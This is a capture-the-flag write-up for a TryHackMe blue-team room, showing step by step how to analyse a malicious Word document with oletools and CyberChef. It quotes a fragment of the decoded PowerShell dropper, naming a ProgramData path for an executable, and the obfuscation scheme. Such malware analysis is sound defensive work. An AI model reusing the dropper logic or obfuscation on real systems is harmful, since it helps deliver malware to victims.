This series of write-ups is for the TryHackMe Room Squid Game, which you can access here: https://tryhackme.com/room/squidgameroom.
This challenge room is one of the few intended for blue teams on TryHackMe, and is categorised as hard, so I thought I would give it a go. The tasks in this room are based on analysing various malicious .doc files.
The room is split into 5 attackers, and I will split this write-up into 5 separate posts going over each task.
We’ll start with Attacker 1.
Start the machine in Task 1. Once loaded, open a terminal window and navigate to the directory ~/Desktop/maldocs/. In here are 5 malicious .doc files. The file needed for Attacker 1 is attacker1.doc
To complete this task, we’re going to be using the tools: oledump, olevba, olemeta, oletimes and CyberChef
Question 1:
What is the malicious C2 domain you found in the maldoc where an executable download was attempted
First of all, we’re going to use oledump, which is already installed on the THM VM. OLEDump is a tool for analysing OLE files. Basic knowledge of oledump is assumed for this room.
Running oledump with no options set against the file gives us information on the data streams inside it:
oledump.py attacker1.doc
There are 13 streams, one of which (stream 8) has the M marker, meaning it contains a VBA macro. We should have a look at this one first of all with the VBA decode option (-v):
oledump.py attacker1.doc -s 8 -vIn this output is a load of VBA. Skimming through it, something interesting jumps out:
I’m no VBA master, but I can see this is replacing the character [ with the character A. Something tells me this will come in useful later…
Now we need to start interrogating these streams for what strings are inside (with the -S) option. The question asks for the C2 domain, so our only option at the minute is to search for the strings in each stream until we come across anything interesting. We go down, starting with stream 1:
oledump.py attacker1.doc -s 1 -SThe first stream that shows up something interesting is stream 4, which contains an obfuscated Powershell command:
We can guess that this is base64 encoded, but it also seems like it’s been further obfuscated, as there are lots of [ characters. This is where our VBA script we’ve found earlier comes in handy.
To help us decode all of this, we’re going to use CyberChef. You can use the web version, or the version loaded on the THM VM.
In CyberChef, paste the Powershell command in the input section, then add the following to the recipe:
- Replace – simple string,
[withA - From Base64
- Remove null bytes
This shows us the de-obfuscated script:
In here we can see a URI which contains a domain, which is likely to be the C2 domain we’re looking for:
Question 2:
What executable file is the maldoc trying to drop
We can get the answer to this question from the Powershell script as well. Look for an executable:
Question 3:
In what folder is it dropping the malicious executable? (hint: %Folder%)
In our de-obfuscated Powershell script we can see where the variable $path is set:
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\QdZGP.exe";We see the special folder location CommonApplicationData being used. A quick Google shows us that in Windows, this maps to the directory C:\ProgramData. The question asks for the answer in the format of a Windows environment path variable (wrapped in %), so the one that matches this directory is:
Question 4:
Provide the name of the COM object the maldoc is trying to access.
The hint for this question says “check clsid field”, which is a good starting place. Googling ‘clsid’ gives this definition:
The Class ID, or CLSID, is a serial number that represents a unique ID for any application component in Windows.
Looking for a clsid in our de-obfuscated output, we can see there is a variable being set:
$clsid = New-Object Guid 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'When Googling our guid, you will find articles such as this one, which contain the answer:
Question 5:
Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)
We can see in our output an IP address, followed by a php extension:
Question 6:
Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)
We can see there are no phone numbers in the de-obfuscated script, so we will most likely have to go back to the strings for this one.
When running oledump on the stream that contains the Powershell script, there are also some other interesting strings:
One of these matches the format given for a phone number:
Question 7:
Doing some static analysis, provide the type of maldoc this is under the keyword “AutoOpen”.
This question is asking us for keywords, so for this we’re going to move onto using another tool: olevba.
olevba is a tool that, among other things, detects suspicious keywords, auto-executable macros and other IOCs.
Running olevba against our document:
olevba attacker1.docWe can see some keywords, including one called AutoOpen, this is where our answer is:
Question 8:
Provide the subject for this maldoc. (make sure to remove the extra whitespace)
We’re now being asked for metadata, something we can get using another, pretty self explanatory, tool: olemeta
Running olemeta against the document gives us all of the metadata for the document:
olemeta attacker1.doc
In this output we’ve got our answer:
Question 9:
Provide the time when this document was last saved. (Format: YEAR-MONTH-DAY XX:XX:XX)
It looks like we should be able to get the answer to this question from the output of olemeta, but using the value of last_saved_date from the output above (2019-02-07 23:45:00) is not correct.
After some head scratching, it turns out we can get the correct answer using the tool oletimes, which is also pretty self explanatory:
oletimes attacker1.doc
From this output, we can see the modification time is different to the olemeta output, and contains our answer:
Question 10:
Provide the stream number that contains a macro.
Now we’re heading back to oledump for the last two questions. Running oledump with no options gives us
The stream with the M marker next to it contains the macro:
Question 11:
Provide the name of the stream that contains a macro.
We can see the name in this output as well. The answer format doesn’t contain slashes, so they’re asking for the last part:
That’s Task 2 – Attacker 1 taken care of. Next time we’ll be looking at Attacker 2
